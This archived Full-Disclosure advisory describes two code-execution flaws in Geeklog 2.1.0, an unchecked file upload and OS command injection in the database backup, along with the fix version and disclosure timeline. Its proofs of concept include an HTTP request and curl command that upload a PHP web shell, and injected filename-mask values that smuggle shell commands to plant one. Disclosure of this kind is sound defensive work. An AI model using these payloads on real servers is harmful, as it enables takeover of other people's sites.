lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Mon, 07 Dec 2015 18:14:08 +0100
From: "Curesec Research Team (CRT)" <crt@...esec.com>
To: fulldisclosure@...lists.org
Subject: [FD] Geeklog 2.1.0: Code Execution

Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    Geeklog 2.1.0
Fixed in:            2.1.1b3
Fixed Version Link:  https://www.geeklog.net/filemgmt/visit.php/1156
Vendor Contact:      geeklog-security@...ts.geeklog.net
Vulnerability Type:  Code Execution
Remote Exploitable:  Yes
Reported to vendor:  09/29/2015
Disclosed to public: 12/02/2015
Release mode:        Coordinated release
CVE:                 requested, but not assigned
Credits              Tim Coen of Curesec GmbH

2. Overview

The admin area of Geeklog suffers from two vulnerabilities that can lead to
code execution: OS Command Injection and Upload of Files with Dangerous Type.

The arbitrary file upload is already fixed in the beta version geeklog-2.1.1b1,
the OS command injection in version 2.1.1b3.

3. Upload of Files with Dangerous Type

CVSS

High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description

When uploading a file, the file type check is performed only client-side. An
attacker can easily bypass this check and thus upload files of dangerous types,
such as PHP files.

To upload files, an attacker needs a registered user that is in the group
"Filemanager Admin".

Proof of Concept


POST /geeklog-2.1.0/public_html/filemanager/connectors/php/filemanager.php HTTP/1.1
Host: localhost
X-Requested-With: XMLHttpRequest
Content-Length: 761
Content-Type: multipart/form-data; boundary=---------------------------10717364298700964751730232773
Cookie: [cookies]

-----------------------------10717364298700964751730232773
Content-Disposition: form-data; name="mode"

add
-----------------------------10717364298700964751730232773
Content-Disposition: form-data; name="currentpath"

/var/www/geeklog-2.1.0/public_html/images/
-----------------------------10717364298700964751730232773
Content-Disposition: form-data; name="filepath"

test.png
-----------------------------10717364298700964751730232773
Content-Disposition: form-data; name="newfile"; filename="shell.php"
Content-Type: image/png

<?php passthru($_GET['x'])
-----------------------------10717364298700964751730232773
Content-Disposition: form-data; name="upload"

Upload
-----------------------------10717364298700964751730232773--

As curl command:


curl -i -s -k  -X 'POST' \
-H 'Content-Type: multipart/form-data; boundary=---------------------------10717364298700964751730232773' \
-b 'gl_session=838973868; geeklog=2; password=18bdbd240593b81a5239285a1f56283b4ae20648;' \
--data-binary $'-----------------------------10717364298700964751730232773\x0d\x0aContent-Disposition: form-data; name=\"mode\"\x0d\x0a\x0d\x0aadd\x0d\x0a-----------------------------10717364298700964751730232773\x0d\x0aContent-Disposition: form-data; name=\"currentpath\"\x0d\x0a\x0d\x0a/var/www/geeklog-2.1.0/public_html/images/\x0d\x0a-----------------------------10717364298700964751730232773\x0d\x0aContent-Disposition: form-data; name=\"filepath\"\x0d\x0a\x0d\x0atest.png\x0d\x0a-----------------------------10717364298700964751730232773\x0d\x0aContent-Disposition: form-data; name=\"newfile\"; filename=\"shell.php\"\x0d\x0aContent-Type: image/png\x0d\x0a\x0d\x0a<?php passthru($_GET[\'x\'])\x0d\x0a-----------------------------10717364298700964751730232773\x0d\x0aContent-Disposition: form-data; name=\"upload\"\x0d\x0a\x0d\x0aUpload\x0d\x0a-----------------------------10717364298700964751730232773--\x0d\x0a' \
'http://localhost/geeklog-2.1.0/public_html/filemanager/connectors/php/filemanager.php'

4. OS Command Injection

CVSS

High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description

When performing a database backup, various settings are passed unsanitized to
exec, leading to code execution.

To exploit this issue, an attacker needs a registered user that is in the group
"Root".

Proof of Concept


1. Change "Backup File Name Mask" in http://localhost/geeklog-2.1.0/public_html/admin/configuration.php?tab-5 to:
    geeklog_db_backup_%Y_%m_%d_%H_%M_%S.sql";echo "<?php passthru(\$_GET['x']);" > shell.php;"
2. Perform database backup here:
    http://localhost/geeklog-2.1.0/public_html/admin/database.php
    The injected commands will be executed.

In the beta version geeklog-2.1.1b1, less-than is filtered out, but OS command
injection is still possible, including the creation of a PHP shell by appending
the injected PHP code to an existing PHP file without closing tags:


    geeklog_db_backup_%Y_%m_%d_%H_%M_%S.sql";echo "passthru(\$_GET['x']);" >> ../filemanager/connectors/php/inc/wideimage/lib/Font/PS.php;"

Code


/admin/database.php
function dobackup()
{
[...]
if (!empty($_CONF['mysqldump_filename_mask'])) {
    $filename_mask = strftime($_CONF['mysqldump_filename_mask']);
}
[...]
$backupfile = $_CONF['backup_path'] . $filename_mask;
[...]
$command .= " $_DB_name > \"$backupfile\"";
[...]
if ($canExec) {
    exec($command);

5. Solution

To mitigate this issue please upgrade at least to version 2.1.1b3:

https://www.geeklog.net/filemgmt/visit.php/1156

Please note that a newer version might already be available.

6. Report Timeline

09/29/2015 Informed Vendor about Issue (no reply)
10/21/2015 Reminded Vendor of Disclosure Date
10/21/2015 Vendor asks for an additional two weeks for testing
11/17/2015 CVE Requested (no reply)
11/17/2015 Reminded Vendor of disclosure date
11/17/2015 Vendor points to beta version and announces release
11/24/2015 Informed Vendor of insufficient fix in beta
11/30/2015 Vendor releases fix
12/02/2015 Disclosed to public


Blog Reference:
https://blog.curesec.com/article/blog/Geeklog-210-Code-Execution-119.html
 
--
blog:  https://blog.curesec.com
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists